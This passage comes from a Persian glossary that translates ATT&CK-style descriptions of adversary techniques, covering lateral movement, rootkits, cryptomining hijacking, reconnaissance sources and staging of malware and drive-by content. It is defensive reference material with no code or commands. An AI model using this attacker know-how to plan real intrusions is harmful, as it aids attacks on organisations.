تکنیک همچنین ممکن است برای تغییر و حذف همانندسازی و سایر ابرداده‌های مرتبط برای جلوگیری از تحلیل پزشکی قانونی استفاده شود. همچنین ممکن است دشمنان از این تکنیک برای انجام SID-History Injection و/یا دستکاری اشیاء (AD) مانند حساب‌ها، لیست‌های کنترل دسترسی، طرح‌واره‌ها) برای ایجاد درهای پشتی برای Persistence استفاده کنند.

کشف سیستم از راه دور

Remote System Discovery

دشمنان ممکن است سعی کنند لیستی از سیستم های دیگر را با آدرس IP، نام میزبان یا شناسه منطقی دیگر در یک شبکه که ممکن است برای حرکت جانبی از سیستم فعلی استفاده شود، دریافت کنند. عملکرد می تواند در ابزارهای دسترسی از راه دور برای فعال کردن این کار وجود داشته باشد، اما ابزارهای موجود در سیستم عامل نیز می توانند از جمله Ping یا net view با استفاده از Net استفاده شوند. دشمنان همچنین ممکن است از فایل‌های میزبان محلی (مانند C:\Windows\System32\Drivers\etc\hosts یا /etc/hosts برای کشف نام میزبان به آدرس IP نگاشت سیستم‌های راه دور استفاده کنند.

ربودن جلسه سرویس از راه دور

Remote Service Session Hijacking

دشمنان ممکن است جلسات قبلی را با سرویس های راه دور کنترل کنند تا به صورت جانبی در یک محیط حرکت کنند. کاربران ممکن است از اعتبارنامه های معتبر برای ورود به سرویسی استفاده کنند که به طور خاص برای پذیرش اتصالات راه دور طراحی شده است، مانند telnet، SSH و.RDP هنگامی که کاربر به یک سرویس وارد می شود، جلسه ای ایجاد می شود که به آنها اجازه می دهد تا تعامل مستمر با آن سرویس را حفظ کنند. دشمنان ممکن است این جلسات را برای انجام اقدامات در سیستم های راه دور هدایت کنند. ربودن جلسه سرویس از راه دور با استفاده از خدمات از راه دور متفاوت است زیرا به جای ایجاد یک جلسه جدید با استفاده از حساب های معتبر، یک جلسه موجود را ربوده است.

خدمات از راه دور

Remote Services

دشمنان ممکن است از حساب های معتبر برای ورود به سرویسی استفاده کنند که به طور خاص برای پذیرش اتصالات راه دور طراحی شده است، مانند telnet، SSH و .VNC سپس حریف ممکن است به عنوان کاربر وارد شده اقداماتی را انجام دهد. در یک محیط سازمانی، سرورها و ایستگاه های کاری را می توان در دامنه ها سازماندهی کرد. دامنه ها مدیریت هویت متمرکز را ارائه می دهند و به کاربران اجازه می دهند با استفاده از یک مجموعه از اعتبارنامه ها در کل شبکه وارد سیستم شوند. اگر یک حریف بتواند مجموعه ای از اعتبار دامنه معتبر را به دست آورد، می تواند با استفاده از پروتکل های دسترسی از راه دور مانند پوسته امن (SSH) یا پروتکل دسکتاپ راه دور (RDP) به بسیاری از ماشین های مختلف وارد شود. برنامه‌های کاربردی قانونی (مانند ابزارهای توسعه نرم‌افزار و سایر برنامه‌های اداری) ممکن است از Remote Services برای دسترسی به میزبان‌های راه دور استفاده کنند. به عنوان مثال، Apple Remote Desktop (ARD) در macOS یک نرم افزار بومی است که برای مدیریت از راه دور استفاده می شود. ARD از ترکیبی از پروتکل‌ها، از جمله VNC برای ارسال صفحه و کنترل بافرها و SSH برای انتقال امن فایل استفاده می‌کند. دشمنان می توانند از برنامه هایی مانند ARD برای به دست آوردن اجرای کد از راه دور و انجام حرکت جانبی سوء استفاده کنند. در نسخه‌های macOS قبل از 10.14، یک دشمن می‌تواند یک جلسه SSH را به یک جلسه ARD افزایش دهد که به دشمن امکان می‌دهد بدون تعامل کاربر، درخواست‌های (TCC) شفافیت، رضایت و کنترل) را بپذیرد و به داده‌ها دسترسی پیدا کند.

نرم افزار دسترسی از راه دور

Remote Access Software

یک دشمن ممکن است از پشتیبانی قانونی دسکتاپ و نرم افزار دسترسی از راه دور، مانند Team Viewer، Go2Assist، LogMein، AmmyyAdmin و غیره برای ایجاد یک کانال فرمان و کنترل تعاملی برای هدف قرار دادن سیستم ها در شبکه استفاده کند. این خدمات معمولاً به عنوان نرم افزار پشتیبانی فنی قانونی استفاده می شوند و ممکن است توسط کنترل برنامه در یک محیط هدف مجاز باشند. ابزارهای دسترسی از راه دور مانند VNC، Ammyy و Teamviewer در مقایسه با سایر نرم افزارهای قانونی که معمولاً توسط دشمنان استفاده می شود، اغلب استفاده می شوند. ابزارهای دسترسی از راه دور ممکن است ایجاد شده و پس از سازش به عنوان کانال ارتباطی جایگزین برای دسترسی اضافی یا به عنوان راهی برای ایجاد یک جلسه دسکتاپ از راه دور تعاملی با سیستم مورد نظر استفاده شوند. آنها همچنین ممکن است به عنوان جزئی از بدافزار برای ایجاد یک اتصال معکوس یا اتصال برگشتی به یک سرویس یا سیستم کنترل شده توسط دشمن استفاده شوند. ابزارهای مدیریتی مانند TeamViewer توسط چندین گروه برای هدف قرار دادن موسسات در کشورهای مورد علاقه دولت روسیه و کمپین های جنایی استفاده شده است.

روت کیت

Rootkit

دشمنان ممکن است از روت کیت ها برای پنهان کردن وجود برنامه ها، فایل ها، اتصالات شبکه، سرویس ها، درایورها و سایر اجزای سیستم استفاده کنند. روت کیت ها برنامه هایی هستند که وجود بدافزار را با رهگیری/قلاب کردن و اصلاح فراخوانی های API سیستم عامل که اطلاعات سیستم را تامین می کنند، پنهان می کنند. قابلیت فعال‌سازی روت‌کیت‌ها یا روت‌کیت ممکن است در سطح کاربر یا هسته در سیستم‌عامل یا پایین‌تر باشد، که شامل Hypervisor، Master Boot Record یا Firmware سیستم می‌شود. روت‌کیت‌ها برای سیستم‌های Windows، Linux و Mac OS X دیده شده‌اند

ربودن منابع

Resource Hijacking

دشمنان ممکن است از منابع سیستم های انتخاب شده برای حل مشکلات منابع فشرده استفاده کنند که ممکن است بر دسترسی سیستم و/یا سرویس میزبان تاثیر بگذارد. یکی از اهداف متداول Resource Hijacking اعتبارسنجی تراکنش‌های شبکه‌های ارزهای دیجیتال و کسب ارز مجازی است. دشمنان ممکن است منابع سیستم کافی را مصرف کنند تا تأثیر منفی بگذارند و/یا باعث شوند ماشین‌های آسیب‌دیده پاسخگو نباشند. سرورها و سیستم‌های مبتنی بر ابر به دلیل پتانسیل بالای منابع موجود، اهداف مشترکی هستند، اما سیستم‌های نقطه پایانی کاربر نیز ممکن است به خطر بیفتند و برای ربودن منابع و استخراج ارزهای دیجیتال مورد استفاده قرار گیرند. محیط‌های کانتینری نیز ممکن است به دلیل سهولت استقرار از طریق APIهای در معرض دید و پتانسیل مقیاس‌گذاری فعالیت‌های استخراج با استقرار یا به خطر انداختن چندین کانتینر در یک محیط یا خوشه مورد هدف قرار گیرند.به‌علاوه، برخی بدافزارهای استخراج ارز دیجیتال، فرآیندهای بدافزار رقیب را از بین می‌برند تا اطمینان حاصل کنند که برای منابع رقابت نمی‌کنند.

گروه تهدید

Rancor

Rancor یک گروه تهدید است که کمپین های هدفمند را علیه منطقه جنوب شرق آسیا رهبری کرده است. Rancor از فریب های سیاسی استفاده می کند تا قربانیان را برای باز کردن اسناد مخرب ترغیب کند.

یک دشمن ظاهراً چینی زبان

Rocke

Rocke یک دشمن ظاهراً چینی زبان است که به نظر می رسد هدف اصلی او سرقت رمزنگاری یا سرقت منابع سیستم قربانی برای اهداف استخراج ارزهای دیجیتال است. نام Rocke از آدرس ایمیل""rocke@live.cn گرفته شده است که برای ایجاد کیف پولی که دارای رمزنگاری جمع آوری شده است، استفاده می شود. محققان همپوشانی هایی را بین راک و گروه جرایم سایبری آهن تشخیص داده اند، اگرچه این انتساب تأیید نشده است.

طرح تاب آوری سایبری

cyber resilience plan

انعطاف‌پذیری سایبری فرآیندی است که نشان می‌دهد چگونه یک کسب‌وکار به تهدیدات سایبری پاسخ می‌دهد. در چشم‌انداز مدرن امروزی، کسب‌وکارها نه تنها نیاز به دفاع در برابر حملات دارند، بلکه باید برای مقابله با نقض‌های امنیتی موفق برنامه‌ریزی کنند.

تزریق SQL

SQL Injection

تزریق SQL یک آسیب‌پذیری امنیتی وب است که به مهاجم اجازه می‌دهد با پرس و جوهایی که یک برنامه در پایگاه داده خود ایجاد می‌کند تداخل داشته باشد. به طور کلی به مهاجم اجازه می‌دهد داده‌هایی را که معمولاً قادر به بازیابی آنها نیست مشاهده کند.

جستجو در منابع بسته

Search Closed Sources

دشمنان می‌توانند اطلاعات مربوط به قربانیان را از منابع بسته جستجو کرده و جمع‌آوری کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. اطلاعات مربوط به قربانیان ممکن است برای خرید از منابع خصوصی و پایگاه‌های داده، مانند اشتراک پولی در فیدهای اطلاعات فنی و اطلاعات تهدید در دسترس باشد. دشمنان همچنین ممکن است اطلاعات را از منابع کمتر معتبر مانند dark webیا بازارهای سیاه جرایم اینترنتی خریداری کنند. اطلاعات از این منابع ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مانند: فیشینگ برای اطلاعات یا جستجو در وب سایت‌ها/دامنه‌های باز) ، ایجاد منابع عملیاتی (به عنوان مثال: توسعه قابلیت‌ها یا دستیابی به قابلیت‌ها) و/ یا دسترسی اولیه (به عنوان مثال: خدمات از راه دور خارجی) فراهم کند.

جستجو در منابع بسته: تهدید فروشندگان اینتل

Search Closed Sources: Threat Intel Vendors

دشمنان ممکن است داده‌های خصوصی فروشندگان اطلاعات تهدید را برای اطلاعاتی که می‌توانند در طول هدف‌گیری مورد استفاده قرار دهند، جستجو کنند. فروشندگان اطلاعات تهدید ممکن است فیدهای پولی یا پورتال‌هایی ارائه دهند که داده‌های بیشتری از آنچه به طور عمومی گزارش شده است ارائه دهند. اگرچه ممکن است جزئیات حساس (مانند نام مشتری و سایر شناسه‌ها) اصلاح شود، این اطلاعات ممکن است حاوی روندهایی در مورد نقض‌هایی مانند صنایع هدف، ادعاهای انتساب و اقدامات متقابل موفق / TTP باشد. دشمنان ممکن است در داده‌های فروشنده اطلاعات تهدید خصوصی جستجو کنند تا اطلاعات قابل اجرا را جمع‌آوری کنند. عوامل تهدید ممکن است به دنبال اطلاعات/شاخص‌هایی باشند که در مورد کمپین‌های خود و همچنین مواردی که توسط دیگر دشمنان انجام می‌شوند و ممکن است با صنایع هدف، قابلیت‌ها/اهداف، یا سایر نگرانی‌های عملیاتی آنها هماهنگ باشد، گردآوری شده‌اند.

جستجو در باز کردن پایگاه‌های اطلاعات فنی

Search Open Technical Databases

دشمنان ممکن است پایگاه‌های اطلاعاتی فنی موجود را که برای قربانیان قابل استفاده است در حین هدف‌گیری جستجو کنند. اطلاعات مربوط به قربانیان ممکن است در پایگاه‌های داده و مخازن آنلاین مانند ثبت دامنه‌ها/گواهینامه‌ها و همچنین مجموعه‌های عمومی داده‌های شبکه/ مصنوعات جمع‌آوری شده از ترافیک و/ یا اسکن‌ها موجود باشد. اطلاعات این منابع ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مانند: فیشینگ برای اطلاعات یا جستجو در وب سایت‌ها/دامنه‌های باز) ، ایجاد منابع عملیاتی (مانند: کسب زیرساخت یا زیرساخت سازش) و/ یا دسترسی اولیه (مانند: خدمات از راه دور خارجی) نشان دهد.

جستجو در پایگاه‌های داده فنی باز: DNS/Passive DNS

Search Open Technical Databases: DNS/Passive DNS

دشمنان ممکن است داده‌هایDNSرا برای اطلاعاتی در مورد قربانیان جستجو کنند که می‌تواند در هنگام هدف‌گیری استفاده شود. اطلاعات DNSممکن است شامل جزئیات مختلفی از جمله سرورهای نام ثبت شده و همچنین سوابقی باشد که آدرس‌دهی زیر دامنه‌های هدف، سرورهای ایمیل و سایر میزبان‌ها را مشخص می‌کند. دشمنان ممکن است داده‌های DNSرا برای جمع‌آوری اطلاعات عملی جستجو کنند. عوامل تهدید می‌توانند مستقیماً از سرورهای نام سازمان مورد نظر پرس و جو کنند، یا از طریق مخازن متمرکز پاسخ‌های پرس و جوی DNS ثبت‌شده (معروف به DNSغیرفعال) جستجو کنند. دشمنان همچنین ممکن است پیکربندی/نشت‌های نادرست DNSرا که اطلاعات مربوط به شبکه‌های داخلی را فاش می‌کند، جستجو کرده و مورد هدف قرار دهند. اطلاعات این منابع ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مثلاً: وب‌سایت‌های متعلق به قربانی جستجو یا جستجو در وب‌سایت‌ها/دامنه‌های باز)، ایجاد منابع عملیاتی (مثلاً: زیرساخت‌های زیرساخت یا سازش) و/یا دسترسی اولیه (مثلاً: خارجی) را نشان دهد. خدمات از راه دور یا رابطه مورد اعتماد).

جستجو در پایگاه‌های اطلاعات فنی باز: WHOIS

Search Open Technical Databases: WHOIS

دشمنان ممکن است داده های عمومی WHOISرا برای اطلاعاتی در مورد قربانیان جستجو کنند که می‌تواند در طول هدف‌گیری مورد استفاده قرار گیرد. داده‌های WHOISتوسط ثبت‌های اینترنتی منطقه‌ای (RIRکه مسئول تخصیص منابع اینترنتی مانند نام دامنه هستند، ذخیره می‌شوند. هرکسی می‌تواند از سرورهای WHOIS اطلاعات مربوط به یک دامنه ثبت‌شده، مانند بلوک‌های IP اختصاص‌یافته، اطلاعات تماس و سرورهای نام DNS را جستجو کند. دشمنان ممکن است داده‌های WHOIS را برای جمع‌آوری اطلاعات عملی جستجو کنند. عوامل تهدید می‌توانند از منابع آنلاین یا ابزارهای خط فرمان برای غارت داده‌های WHOISبرای کسب اطلاعات در مورد قربانیان احتمالی استفاده کنند. اطلاعات حاصل از این منابع ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مثلاً اسکن فعال یا فیشینگ برای اطلاعات)، ایجاد منابع عملیاتی (مثلاً زیرساخت‌های زیرساخت یا سازش) و/یا دسترسی اولیه (مثلاً: خدمات از راه دور خارجی یا رابطه معتمد) نشان دهد. ).

جستجو در پایگاه‌های اطلاعات فنی باز: گواهی‌های دیجیتال

Search Open Technical Databases: Digital Certificates

دشمنان ممکن است داده‌های گواهی دیجیتال عمومی را برای اطلاعاتی درباره قربانیان جستجو کنند که می‌تواند در هنگام هدف‌گیری استفاده شود. گواهی‌های دیجیتال توسط یک مرجع صدور گواهی (CA) به منظور تأیید رمزنگاری منشأ محتوای امضا شده صادر می‌شوند. این گواهی‌ها، مانند گواهی‌هایی که برای ترافیک وب رمزگذاری‌شده ارتباطات (HTTPS SSL/TLS)استفاده می‌شوند، حاوی اطلاعاتی درباره سازمان ثبت‌شده مانند نام و مکان هستند. دشمنان ممکن است داده‌های گواهی دیجیتال را برای جمع‌آوری اطلاعات عملی جستجو کنند. عوامل تهدید می‌توانند از منابع آنلاین و ابزارهای جستجو برای جمع‌آوری اطلاعات در مورد گواهی‌ها استفاده کنند. داده‌های گواهی دیجیتال ممکن است از مصنوعات امضا شده توسط سازمان نیز در دسترس باشد (مثلاً گواهی‌های استفاده شده از ترافیک وب رمزگذاری شده با محتوا ارائه می‌شوند). اطلاعات از این منابع ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مثلاً اسکن فعال یا فیشینگ برای اطلاعات)، ایجاد منابع عملیاتی (مثلاً: توسعه قابلیت‌ها یا به دست آوردن قابلیت‌ها) و/یا دسترسی اولیه (مثلاً: خدمات از راه دور خارجی یا رابطه مورد اعتماد) نشان دهد.

جستجو در پایگاه‌های داده فنی باز: اسکن پایگاه‌های داده

Search Open Technical Databases: Scan Databases

دشمنان ممکن است در پایگاه‌های اطلاعاتی اسکن عمومی برای اطلاعاتی درباره قربانیان جستجو کنند که می‌تواند در هنگام هدف‌گیری استفاده شود. سرویس‌های آنلاین مختلف به طور مداوم نتایج اسکن‌ها/بررسی‌های اینترنتی را منتشر می‌کنند و اغلب اطلاعاتی مانند آدرس‌های IP فعال، نام میزبان، پورت‌های باز، گواهی‌ها و حتی بنرهای سرور را جمع‌آوری می‌کنند. دشمنان ممکن است پایگاه‌های داده را برای جمع‌آوری اطلاعات عملی جستجو کنند. عوامل تهدید می توانند از منابع آنلاین و ابزارهای جستجو برای جمع آوری اطلاعات از این خدمات استفاده کنند. دشمنان ممکن است به دنبال اطلاعاتی در مورد اهداف قبلاً شناسایی شده خود باشند یا از این مجموعه داده‌ها برای کشف فرصت‌هایی برای نقض موفق استفاده کنند. اطلاعات این منابع ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مثلاً اسکن فعال یا جستجو در وب‌سایت‌ها/دامنه‌های باز)، ایجاد منابع عملیاتی (مثلاً: توسعه قابلیت‌ها یا به دست آوردن قابلیت‌ها) و/یا دسترسی اولیه (مثلاً: خدمات از راه دور خارجی یا بهره برداری از برنامه عمومی).

جستجو در وب سایت‌ها/دامنه‌های باز

Search Open Websites/Domains

دشمنان ممکن است وب سایت‌ها و یا دامنه‌های آزاد موجود برای اطلاعات مربوط به قربانیان را که می‌توانند در هنگام هدف‌گیری استفاده شوند جستجو کنند. اطلاعات مربوط به قربانیان ممکن است در سایت‌های مختلف آنلاین، مانند رسانه‌های اجتماعی، سایت‌های جدید، یا کسانی که اطلاعات مربوط به فعالیت‌های تجاری مانند استخدام یا قراردادهای درخواست شده/ پاداش را در اختیار دارند، ارائه دهند. بسته به اطلاعاتی که می‌خواهند جمع‌آوری کنند، دشمنان ممکن است در سایت‌های مختلف آنلاین جستجو کنند. اطلاعات از این منابع ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مانند: فیشینگ برای اطلاعات یا جستجو در پایگاه های اطلاعات فنی باز) ، ایجاد منابع عملیاتی (به عنوان مثال: ایجاد حساب‌ها) و یا دسترسی اولیه (مانند: خدمات از راه دور خارجی یا فیشینگ)فراهم کنند.

جستجو در وب سایت‌ها/دامنه‌های باز: رسانه‌های اجتماعی

Search Open Websites/Domains: Social Media

دشمنان ممکن است در رسانه‌های اجتماعی اطلاعاتی در مورد قربانیان جستجو کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. سایت‌های رسانه‌های اجتماعی ممکن است حاوی اطلاعات مختلفی درباره یک سازمان قربانی باشند، مانند اطلاعیه‌های تجاری و همچنین اطلاعاتی درباره نقش‌ها، مکان‌ها و علایق کارکنان. دشمنان بسته به اطلاعاتی که به دنبال جمع‌آوری آن هستند ممکن است در سایت‌های رسانه‌های اجتماعی مختلف جستجو کنند. عاملان تهدید ممکن است به طور منفعلانه داده‌ها را از این سایت‌ها جمع‌آوری کنند، و همچنین از اطلاعات جمع‌آوری‌شده برای ایجاد نمایه‌ها/گروه‌های جعلی استفاده کنند تا قربانیان را برای افشای اطلاعات خاص (به عنوان مثال سرویسSpearphishing وادار کنند. اطلاعات این منابع ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مثلاً فیشینگ برای اطلاعات یا جستجو در پایگاه‌های اطلاعات فنی باز)، ایجاد منابع عملیاتی (مثلاً: ایجاد حساب‌ها یا حساب‌های در معرض خطر) و/یا دسترسی اولیه (مثلاً: Spearphishing از طریق سرویس) نشان دهد.

جستجو در وب سایت‌ها/دامنه‌های باز: موتورهای جستجو

Search Open Websites/Domains: Search Engines

دشمنان ممکن است از موتورهای جستجو برای جمع‌آوری اطلاعات در مورد قربانیان استفاده کنند که می‌تواند در هنگام هدف‌گیری استفاده شود. خدمات موتور جستجوی معمولی، سایت‌های آنلاین را برای فهرست‌بندی متن می‌خزند و ممکن است نحو تخصصی را برای جستجوی کلمات کلیدی خاص یا انواع خاصی از محتوا (به عنوان مثال انواع فایل) در اختیار کاربران قرار دهد. دشمنان ممکن است بسته به اطلاعاتی که به دنبال جمع آوری آن هستند، پرس و جوهای مختلف موتور جستجو را ایجاد کنند. عوامل تهدید ممکن است از موتورهای جستجو برای جمع‌آوری اطلاعات عمومی در مورد قربانیان استفاده کنند، و همچنین از پرس و جوهای تخصصی برای جستجوی نشت اطلاعات حساس مانند جزئیات شبکه یا اعتبارنامه استفاده کنند. اطلاعات این منابع ممکن است فرصت‌هایی را برای سایر اشکال شناسایی نشان دهد.

جستجو در وب‌سایت‌های متعلق به قربانیان

Search Victim-Owned Websites

دشمنان ممکن است وب‌سایت‌های متعلق به قربانی را برای اطلاعاتی که می‌تواند در هنگام هدف‌گیری استفاده شود جستجو کنند. وب‌سایت‌های متعلق به قربانیان ممکن است شامل جزئیات مختلفی از جمله نام بخش‌/ بخش‌ها، مکان‌های فیزیکی و اطلاعات مربوط به کارکنان اصلی مانند نام‌ها، نقش‌ها و اطلاعات تماس (مانند آدرس‌های ایمیل) باشد. این سایت‌ها همچنین ممکن است دارای جزئیاتی باشند که عملیات و روابط تجاری را برجسته می‌کند. دشمنان ممکن است برای جمع‌آوری اطلاعات قابل اجرا، وب سایت‌های متعلق به قربانیان را جستجو کنند. اطلاعات از این منابع ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مانند: فیشینگ برای اطلاعات یا جستجو در پایگاه‌های اطلاعات فنی باز) ، ایجاد منابع عملیاتی (به عنوان مثال: ایجاد حساب‌ها) و یا دسترسی اولیه (به عنوان مثال: رابطه مورد اعتماد یا فیشینگ) نشان دهد.

اسکن بلوک‌های IP

Scanning IP Blocks

دشمنان ممکن است بلوک‌های IP قربانی را برای جمع‌آوری اطلاعاتی که می‌تواند در هنگام هدف‌گیری استفاده شود، اسکن کنند آدرس‌های IP عمومی ممکن است به صورت بلوک یا طیف وسیعی از آدرس‌های متوالی به سازمان‌ها اختصاص داده شود، مانند آدرس‌های IP که به طور فعال در حال استفاده هستند و همچنین اطلاعات دقیق‌تر در مورد میزبان‌هایی که این آدرس‌ها را اختصاص داده‌اند. اسکن‌ها ممکن است از پینگ‌های ساده (درخواست‌ها و پاسخ‌های (ICMP)گرفته تا اسکن‌های ظریف‌تر که ممکن است نرم افزار/ نسخه میزبان را از طریق بنرهای سرور یا دیگر آثار شبکه نشان دهد. اطلاعات حاصل از این اسکن‌ها ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (به عنوان مثال: جستجو در وب سایت‌ها / دامنه‌های باز یا جستجو در پایگاه‌های فنی باز) ، ایجاد منابع عملیاتی (به عنوان مثال: توسعه قابلیت‌ها یا دستیابی به قابلیت‌ها) و یا دسترسی اولیه (مانند: کنترل از راه دور خارجی)

قابلیت‌های صحنه

Stage Capabilities

دشمنان می‌توانند قابلیت‌هایی را آپلود، نصب کنند، یا به‌طور دیگری راه‌اندازی کنند که می‌تواند در طول هدف‌گیری استفاده شود. برای پشتیبانی از عملیات خود، یک دشمن ممکن است نیاز داشته باشد قابلیت‌هایی را که توسعه داده است یا به دست آورده است و در زیرساخت‌های تحت کنترل خود قرار دهد. این قابلیت‌ها ممکن است روی زیرساخت‌هایی که قبلاً توسط حریف خریداری یا اجاره شده است یا به‌طور دیگری توسط آنها در معرض خطر قرار گرفته است، اجرا شود. قابلیت‌ها همچنین می‌توانند در سرویس‌های وب، مانند GitHub یا Pastebin، اجرا شوند. مرحله‌بندی قابلیت‌ها می‌تواند به دشمن در تعدادی از رفتارهای دسترسی اولیه و پس از سازش کمک کند، از جمله: مرحله بندی منابع وب لازم برای اجرای Drive-by Compromise زمانی که کاربر در یک سایت مرور می‌کند. مرحله‌بندی منابع وب برای هدف پیوند برای استفاده با spearphishing. آپلود بدافزار یا ابزار در مکانی قابل دسترسی برای شبکه قربانی برای فعال کردن Ingress Tool Transfer نصب یک گواهینامه SSL/TLS که قبلاً به دست آورده‌اید تا از آن برای رمزگذاری دستورات و کنترل ترافیک استفاده کنید (مثلاً رمزنگاری نامتقارن با پروتکل‌های وب).

قابلیت‌های مرحله: آپلود بدافزار

Stage Capabilities: Upload Malware

دشمنان ممکن است بدافزار را در زیرساخت‌های شخص ثالث یا تحت کنترل دشمن آپلود کنند تا در هنگام هدف‌گیری در دسترس قرار گیرند. نرم‌افزارهای مخرب می‌توانند شامل payloads،droppers، ابزارهای post-compromise،backdoorها و انواع محتوای مخرب دیگر باشند. دشمنان ممکن است بدافزار را برای پشتیبانی از عملیات خود آپلود کنند، مانند در دسترس قرار دادن یک محموله برای شبکه قربانی برای فعال کردن Ingress Tool Transfer با قرار دادن آن در یک وب سرور قابل دسترسی به اینترنت. بدافزار ممکن است روی زیرساخت‌هایی قرار گیرد که قبلاً توسط دشمن خریداری/اجاره شده است (Acquire Infrastructure) یا به‌طور دیگری توسط آن‌ها به خطر افتاده است. Compromise Infrastructure بدافزار همچنین می‌تواند در سرویس‌های وب مانند GitHub یا Pastebin اجرا شود. دشمنان ممکن است فایل‌های پشتیبان، مانند باینری‌های برنامه، تصاویر ماشین مجازی، یا تصاویر کانتینر را در فروشگاه‌ها یا مخازن نرم‌افزار شخص ثالث (مانند GitHub، CNET، AWS Community AMI، Docker Hub) آپلود کنند. در صورت برخورد تصادفی، قربانیان می‌توانند مستقیماً این فایل‌های درپشتی را از طریق User Execution دانلود یا نصب کنند. پنهان کردن ممکن است احتمال اجرای اشتباه کاربران این فایل‌ها را افزایش دهد.

قابلیت‌های مرحله: ابزار آپلود

Stage Capabilities: Upload Tool

دشمنان ممکن است ابزارهایی را در زیرساخت‌های شخص ثالث یا تحت کنترل دشمن آپلود کنند تا در هنگام هدف‌گیری به آن دسترسی داشته باشند. ابزارها می توانند منبع باز یا بسته، رایگان یا تجاری باشند. ابزارها را می توان برای اهداف مخرب توسط دشمن استفاده کرد، اما (برخلاف بدافزار) برای آن اهداف مثلاً PsExecدر نظر گرفته نشده بود. دشمنان ممکن است ابزارهایی را برای پشتیبانی از عملیات خود آپلود کنند، مانند در دسترس قرار دادن ابزاری برای شبکه قربانی برای فعال کردن انتقال ابزار Ingress با قرار دادن آن در یک وب سرور قابل دسترسی به اینترنت. ابزارها ممکن است روی زیرساخت‌هایی قرار داده شوند که قبلاً توسط دشمن خریداری/اجاره شده‌اند (در زیرساخت به دست آوردن) یا در غیر این صورت توسط آنها (زیرساخت سازش) در معرض خطر قرار گرفته است. ابزارها همچنین می‌توانند در سرویس‌های وب، مانند مخزن GitHub کنترل شده توسط دشمن، اجرا شوند.دشمنان می‌توانند با دانلود مستقیم ماشین‌های قربانی آسیب‌دیده ابزار را از یک مکان میزبانی شخص ثالث (مثلاً مخزن GitHub کنترل‌شده غیر دشمن)، از جمله سایت میزبانی اصلی ابزار، از نیاز به آپلود ابزار اجتناب کنند.

قابلیت‌های مرحله: نصب گواهی دیجیتال

Stage Capabilities: Install Digital Certificate

دشمنان ممکن است گواهی‌های SSL/TLS را نصب کنند که می‌تواند در هنگام هدف‌گیری استفاده شود. گواهینامه‌های SSL/TLS فایل‌هایی هستند که می‌توانند روی سرورها نصب شوند تا ارتباطات ایمن بین سیستم‌ها را فعال کنند. گواهی‌های دیجیتال شامل اطلاعات کلید، اطلاعات مربوط به هویت مالک آن و امضای دیجیتال نهادی است که صحت محتوای گواهی را تأیید کرده است. اگر امضا معتبر باشد و شخصی که گواهی را بررسی می‌کند به امضاکننده اعتماد کند، می‌داند که می‌تواند از آن کلید برای برقراری ارتباط امن با صاحب آن استفاده کند. گواهی‌ها را می‌توان در یک سرور آپلود کرد، سپس سرور را می‌توان پیکربندی کرد تا از گواهی برای فعال کردن ارتباط رمزگذاری شده با آن استفاده کند. دشمنان ممکن است گواهی‌های SSL/TLS را نصب کنند که می‌تواند برای پیشبرد عملیات‌هایشان استفاده شود، مانند رمزگذاری ترافیکC2 (مثلاً رمزنگاری نامتقارن با پروتکل‌های وب) یا اعتبار دادن به یک سایت جمع‌آوری اعتبار. نصب گواهی‌های دیجیتال ممکن است برای تعدادی از انواع سرورها، از جمله سرورهای وب و سرورهای ایمیل، انجام شود. دشمنان می‌توانند گواهی‌های دیجیتالی را دریافت کنند یا گواهی‌هایی با امضای خود ایجاد کنند. سپس گواهی‌های دیجیتال را می‌توان بر روی زیرساخت‌های کنترل‌شده دشمن نصب کرد که ممکن است به‌دست‌آمده باشند (در زیرساخت‌ها) یا قبلاً در معرض خطر قرار گرفته باشند (زیرساخت سازش).

قابلیت‌های مرحله: درایو با هدف

Stage Capabilities: Drive-by Target

دشمنان ممکن است یک محیط عملیاتی برای آلوده کردن سیستم هایی که از یک وب سایت در طول دوره عادی مرور بازدید می کنند، آماده کنند. سیستم‌های نقطه پایانی ممکن است از طریق مرور در سایت‌های تحت کنترل دشمن، مانند Drive-by Compromise، به خطر بیفتند. در چنین مواردی، مرورگر وب کاربر معمولاً برای بهره برداری هدف قرار می گیرد (اغلب نیازی به تعامل اضافی با کاربر پس از فرود در سایت نیست)، اما دشمنان همچنین ممکن است وب سایت‌هایی را برای رفتار غیر بهره برداری مانند Application Access Token راه‌اندازی کنند. قبل از Drive-by Compromise، دشمنان باید منابع مورد نیاز برای ارائه این سوء استفاده را به کاربرانی که به سایت‌های کنترل شده توسط دشمن مرور می کنند، آماده کنند. محتوای Drive-by می‌تواند روی زیرساخت‌های کنترل‌شده توسط دشمن که به دست آمده است (Acquire Infrastructure) یا قبلاً در معرض خطر قرار گرفته است (Compromise Infrastructure) نمایش داده شود. دشمنان ممکن است محتوای وب مخرب مانند جاوا اسکریپت را به وب سایت ها آپلود یا تزریق کنند. این ممکن است به روش‌های مختلفی انجام شود، از جمله قرار دادن اسکریپت مخرب در صفحات وب یا سایر محتوای وب قابل کنترل توسط کاربر مانند پست‌های انجمن. دشمنان همچنین ممکن است تبلیغات اینترنتی مخرب ایجاد کنند و از طریق ارائه دهندگان تبلیغات قانونی فضای تبلیغاتی را در یک وب سایت خریداری کنند. علاوه بر صحنه‌سازی محتوا برای سوء استفاده از مرورگر وب کاربر، دشمنان همچنین ممکن است محتوای برنامه‌نویسی را برای نمایه مرورگر کاربر (مانند اطلاعات جمع‌آوری میزبان قربانی) برای اطمینان از آسیب‌پذیر بودن آن قبل از تلاش برای بهره‌برداری آماده کنند.وب‌سایت‌هایی که توسط یک دشمن در معرض خطر قرار می‌گیرند و از آنها برای اجرای یک درایو استفاده می‌شوند، ممکن است توسط یک جامعه خاص، مانند دولت، یک صنعت خاص، یا منطقه مورد بازدید قرار گرفته باشند، که در آن هدف، به خطر انداختن یک کاربر خاص یا مجموعه‌ای از کاربران بر اساس یک اشتراک مشترک است. علاقه. این نوع حمله هدفمند به یک حمله استراتژیک وب یا حمله چاله آب اطلاق می شود. دشمنان 